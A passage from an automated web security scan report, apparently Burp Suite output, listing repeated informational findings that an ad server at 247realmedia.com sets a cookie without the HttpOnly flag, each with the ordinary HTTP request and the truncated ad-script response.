14.323. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1046826505@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1046826505@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1046826505@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:58:27 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4537
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1498623288/Middle
...[SNIP]...

14.324. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1047418271@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1047418271@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1047418271@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 03:01:53 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4292
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/907715433/Middle/
...[SNIP]...

14.325. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1055977740@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1055977740@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1055977740@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:56:24 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4263
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/782277154/Middle/
...[SNIP]...

14.326. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1079026132@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1079026132@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1079026132@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:58:17 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4334
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1140430199/Middle
...[SNIP]...

14.327. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1116487764@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1116487764@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1116487764@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:59:03 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4551
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/293324580/Middle/
...[SNIP]...

14.328. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1117083037@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1117083037@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1117083037@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:57:27 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4537
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2067819938/Middle
...[SNIP]...

14.329. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1118187308@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1118187308@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1118187308@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:58:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4574
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1201687724/Middle
...[SNIP]...

14.330. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1128492533@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1128492533@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1128492533@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:56:31 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4269
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/781217496/Middle/
...[SNIP]...

14.331. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1133836899@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1133836899@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1133836899@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:53:53 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4624
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1714346640/Middle
...[SNIP]...

14.332. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1139218526@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1139218526@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1139218526@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:57:49 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4263
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1816417247/Middle
...[SNIP]...

14.333. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1167274727@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1167274727@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1167274727@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:55:42 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4328
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1303798805/Middle
...[SNIP]...

14.334. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1209535023@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1209535023@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1209535023@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:58:37 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4511
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1881531045/Middle
...[SNIP]...

14.335. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1216110988@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1216110988@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1216110988@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:52:51 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4562
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/970246968/Middle/
...[SNIP]...

14.336. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1225562716@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1225562716@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1225562716@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:56:36 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4808
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1077268478/Middle
...[SNIP]...

14.337. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1239081530@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1239081530@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1239081530@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:59:40 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4571
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2095119772/Middle
...[SNIP]...

14.338. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1241424720@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1241424720@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
